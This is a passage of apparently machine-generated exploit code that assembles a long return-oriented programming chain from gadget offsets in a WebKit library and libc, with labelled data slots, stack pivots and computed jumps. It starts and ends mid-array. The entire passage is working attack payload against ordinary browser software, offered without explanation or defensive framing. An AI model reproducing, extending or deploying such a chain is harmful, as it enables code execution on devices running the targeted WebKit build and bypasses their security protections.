ropchain+262248, //L4880
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+262232, //L4878
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4878:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4880:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+262408, //L4884
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+262376, //L4882
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+262392, //L4883
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4881:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L4882:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4883:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4884:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+262464, //L4886
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L4886:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+262592, //L4888
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+262608, //L4889
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+262576, //L4887
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4887:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4888:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4889:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+262768, //L4893
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+262736, //L4891
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+262752, //L4892
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4890:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L4891:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4892:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4893:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+262824, //L4895
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L4895:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+262952, //L4897
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+262968, //L4898
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+262936, //L4896
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4896:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4897:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4898:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+263080, //L4900
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+263128, //L4903
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+263096, //L4901
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4900:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4901:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4902:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4903:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+263240, //L4904+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+263232, //L4904
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4904:
db([0, 0]); // 0x0
set_gadgets([
ropchain+263256, //L4904+24
ropchain+265280, //L4899
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+263296, //L4905
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4905:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4906:
db([45, 0]); // 0x2d
set_gadget(libc_base+144605,); //pop rdi
//L4907:
db([45, 0]); // 0x2d
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+263488, //L4911
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+263456, //L4909
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+263472, //L4910
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4908:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L4909:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4910:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4911:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+263544, //L4913
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L4913:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+263672, //L4915
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+263688, //L4916
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+263656, //L4914
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4914:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4915:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4916:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+263784, //L4918
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+263768, //L4917
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4917:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4918:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+263864, //L4919
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4919:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4921:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+263984, //L4924
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+263968, //L4922
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4922:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4924:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+264128, //L4927
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+264096, //L4925
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+264112, //L4926
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4925:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4926:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4927:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+264200, //L4929
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4929:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+264256, //L4930
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4930:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+264336, //L4932
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4932:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4934:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+264456, //L4937
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+264440, //L4935
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4935:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4937:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+264600, //L4940
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+264568, //L4938
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+264584, //L4939
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4938:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4939:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4940:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+264688, //L4942
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L4941:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L4942:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+264744, //L4943
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4943:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4945:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+264824, //L4947
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4947:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+264928, //L4948
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+264944, //L4949
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4948:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4949:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+265032, //L4951
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4951:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+265088, //L4952
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4952:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+265160, //L4955
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4955:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+265216, //L4956
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4956:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+271584, //L4958
//L4899:
libc_base+764760, //pop rsi
ropchain+265320, //L4959
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4959:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4961:
db([96, 0]); // 0x60
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+265440, //L4964
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+265424, //L4962
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4962:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4964:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+265616, //L4967
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+265632, //L4968
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+265584, //L4965
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+265600, //L4966
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4965:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4966:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4967:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4968:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+265728, //L4970
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+265712, //L4969
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4969:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4970:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L4971:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L4972:
db([2, 0]); // 0x2
set_gadget(libc_base+763368,); //pop rcx
//L4973:
db([2, 0]); // 0x2
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+265928, //L4975
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4975:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+265984, //L4976
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4976:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+266120, //L4980
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+266104, //L4979
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4978:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4979:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4980:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+266256, //L4983
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+266288, //L4985
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+266240, //L4982
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4982:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4983:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4984:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4985:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+266400, //L4986+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+266392, //L4986
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4986:
db([0, 0]); // 0x0
set_gadgets([
ropchain+266416, //L4986+24
ropchain+268440, //L4981
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+266456, //L4987
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4987:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4988:
db([43, 0]); // 0x2b
set_gadget(libc_base+144605,); //pop rdi
//L4989:
db([43, 0]); // 0x2b
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+266648, //L4993
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+266616, //L4991
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+266632, //L4992
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4990:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L4991:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4992:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4993:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+266704, //L4995
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L4995:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+266832, //L4997
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+266848, //L4998
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+266816, //L4996
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4996:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4997:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4998:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+266944, //L5000
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+266928, //L4999
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4999:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5000:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+267024, //L5001
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5001:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5003:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+267144, //L5006
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+267128, //L5004
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5004:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5006:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+267288, //L5009
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+267256, //L5007
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+267272, //L5008
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5007:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5008:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5009:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+267360, //L5011
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5011:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+267416, //L5012
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5012:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+267496, //L5014
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5014:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5016:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+267616, //L5019
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+267600, //L5017
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5017:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5019:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+267760, //L5022
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+267728, //L5020
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+267744, //L5021
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5020:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5021:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5022:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+267848, //L5024
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L5023:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L5024:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+267904, //L5025
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5025:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5027:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+267984, //L5029
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5029:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+268088, //L5030
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+268104, //L5031
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5030:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5031:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
